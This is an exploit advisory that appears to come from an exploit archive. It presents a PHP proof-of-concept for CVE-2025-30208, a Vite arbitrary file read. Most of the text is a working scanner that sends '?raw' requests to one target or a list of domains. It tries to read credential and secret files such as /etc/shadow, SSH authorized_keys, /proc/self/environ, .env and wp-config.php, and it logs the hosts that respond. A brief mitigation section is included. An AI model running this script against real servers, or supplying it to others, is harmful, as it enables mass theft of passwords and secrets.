=============================================================================================================================================
| # Title     : Vite 6.2.2 Arbitrary File Read – PHP Exploit                                                                                |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits)                                                            |
| # Vendor    : https://vite.dev/                                                                                                           |
=============================================================================================================================================

[+] References : https://packetstorm.news/files/id/190227/ & 	CVE-2025-30208

[+] Summary 


Vite contains an arbitrary file read vulnerability allowing an attacker to read arbitrary files on the server by requesting a crafted path suffixed with ?raw. This PoC demonstrates automated checks for a target or a list of targets and attempts to retrieve local files by appending ?raw.

Technical Details:

The PoC sends HTTP GET requests to TARGET + FILE_PATH + "?raw".

When the response code is HTTP 200 and the response body is non-empty, the file is considered retrievable (vulnerable).

The PoC uses cURL (in PHP) and allows toggles for verbose output, output file, and trying multiple payloads.

A production-ready PHP script vite_afr_poc.php is provided (see above).

[+] Usage examples:

Single target: php poc.php http://localhost:5173 --file=/etc/passwd --verbose --output=found.txt

Multiple targets: poc.php --list=targets.txt --try-all --output=found.txt

[+] Impact:

Disclosure of sensitive files such as /etc/passwd, .env, config files, and other server-local secrets.

[+] Mitigation:

Upgrade Vite to the vendor-fixed version. Apply vendor patches.

Harden server-side path handling and ensure raw file access isn't exposed via the webserver or dev server endpoints.

In production, disable dev server features or restrict them to loopback interfaces only.

[+] poc

Run using: php poc.php [target] [--list=domains.txt] [--file=/etc/passwd] [--verbose] [--output=found.txt] [--try-all]


<?php
/**
 * PoC: CVE-2025-30208 - Vite Arbitrary File Read 
 * Usage: php poc.php [target] [--list=domains.txt] [--file=/etc/passwd] [--verbose] [--output=found.txt] [--try-all]
 * by indoushka
 */

ini_set('display_errors', "0");
date_default_timezone_set('UTC');

$options = getopt("", ["list:", "file:", "verbose", "output:", "try-all", "help"]);
$argv_copy = $argv;
array_shift($argv_copy); // remove script name

// Determine positional target if provided
$target = null;
foreach ($argv_copy as $arg) {
    if (substr($arg, 0, 2) === "--") continue;
    if ($arg === basename(__FILE__)) continue;
    // skip known flags (handled by getopt)
    if (strpos($arg, '=') !== false) continue;
    // take first non-flag as target
    if ($target === null) $target = $arg;
}

// Default file based on OS
$osFamily = PHP_OS_FAMILY; // "Windows", "Linux", "Darwin", etc.
$defaultFile = ($osFamily === "Windows") ? "C:\\Windows\\System32\\drivers\\etc\\hosts" : "/etc/passwd";

$fileToRead = isset($options['file']) ? $options['file'] : $defaultFile;
$domainListFile = isset($options['list']) ? $options['list'] : null;
$verbose = isset($options['verbose']);
$outputFile = isset($options['output']) ? $options['output'] : null;
$tryAll = isset($options['try-all']);

// Payloads (common sensitive paths) — used when --try-all provided
$payloads = [
    // Unix/Linux
    "/etc/passwd",
    "/etc/hosts",
    "/proc/self/environ",
    "/etc/shadow",
    "/root/.ssh/authorized_keys",
    // Common web files
    "/.env",
    "/config.php",
    "/wp-config.php",
    // Windows
    "C:\\Windows\\System32\\drivers\\etc\\hosts",
    "C:\\Windows\\win.ini"
];

function print_rtl($text) {
    // For CLI, we just output. The user requested RTL formatting in chat.
    echo $text . PHP_EOL;
}

function build_url($target, $path) {
    // Build URL carefully: if target ends with slash and path begins with slash, avoid double slash.
    $t = rtrim($target, "/");
    // If path is absolute file path (starts with / or letter:), we still append as in original PoC: target + path + ?raw
    // But for Windows paths, convert backslashes to forward slashes for URL usage.
    $p = $path;
    $p = str_replace("\\", "/", $p);
    // Ensure there's a slash between target and path if not present
    if (strpos($p, "/") !== 0) {
        $p = "/" . $p;
    }
    return $t . $p . "?raw";
}

function http_get($url, $timeout = 5) {
    // Use cURL
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
    curl_setopt($ch, CURLOPT_TIMEOUT, $timeout);
    // Ignore SSL verification like original PoC
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
    // Set a reasonable User-Agent
    curl_setopt($ch, CURLOPT_USERAGENT, "PoC-CVE-2025-30208-php/1.0");
    $body = curl_exec($ch);
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    $err = null;
    if ($body === false) {
        $err = curl_error($ch);
    }
    curl_close($ch);
    return ['code' => $http_code, 'body' => $body, 'error' => $err];
}

function report_vuln($url, $outputFile = null) {
    $msg = "[+] Vulnerable : " . $url;
    echo $msg . PHP_EOL;
    if ($outputFile) {
        file_put_contents($outputFile, $url . PHP_EOL, FILE_APPEND | LOCK_EX);
    }
}

function check_vulnerability($target, $filePath, $verbose=false, $output=null) {
    $url = build_url($target, $filePath);
    echo "[*] Testing: {$url}" . PHP_EOL;
    $res = http_get($url, 5);
    if ($res['error']) {
        echo "[!] Error testing {$url}: " . $res['error'] . PHP_EOL;
        return;
    }
    if ($res['code'] === 200 && strlen((string)$res['body']) > 0) {
        report_vuln($url, $output);
        if ($verbose) {
            echo PHP_EOL . "--- File Content Start ---" . PHP_EOL;
            // Print first 500 chars safely
            $snippet = mb_substr((string)$res['body'], 0, 500);
            echo $snippet . PHP_EOL;
            echo "--- File Content End ---" . PHP_EOL . PHP_EOL;
        }
    } else {
        echo "[-] Not vulnerable or file does not exist: {$url} (HTTP {$res['code']})" . PHP_EOL;
    }
}

function check_multiple_domains($filePath, $domainListFile, $verbose=false, $output=null, $tryAll=false, $payloads=[]) {
    if (!file_exists($domainListFile)) {
        echo "[!] Error: The file '{$domainListFile}' does not exist." . PHP_EOL;
        return;
    }
    $lines = file($domainListFile, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
    foreach ($lines as $domain) {
        $domain = trim($domain);
        if ($domain === "") continue;
        if ($tryAll && !empty($payloads)) {
            foreach ($payloads as $p) {
                check_vulnerability($domain, $p, $verbose, $output);
            }
        } else {
            check_vulnerability($domain, $filePath, $verbose, $output);
        }
    }
}

// Main execution flow
if (isset($options['help'])) {
    echo "Usage: php " . basename(__FILE__) . " [target] [--list=domains.txt] [--file=/etc/passwd] [--verbose] [--output=found.txt] [--try-all]" . PHP_EOL;
    exit(0);
}

if ($domainListFile) {
    check_multiple_domains($fileToRead, $domainListFile, $verbose, $outputFile, $tryAll, $payloads);
} elseif ($target) {
    if ($tryAll) {
        foreach ($payloads as $p) {
            check_vulnerability($target, $p, $verbose, $outputFile);
        }
    } else {
        check_vulnerability($target, $fileToRead, $verbose, $outputFile);
    }
} else {
    echo "Please provide a target URL or a domain list file. Example:" . PHP_EOL;
    echo "php " . basename(__FILE__) . " http://localhost:5173 --file=/etc/passwd --verbose --output=found.txt" . PHP_EOL;
    echo "php " . basename(__FILE__) . " --list=targets.txt --try-all --output=found.txt" . PHP_EOL;
    exit(1);
}


Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================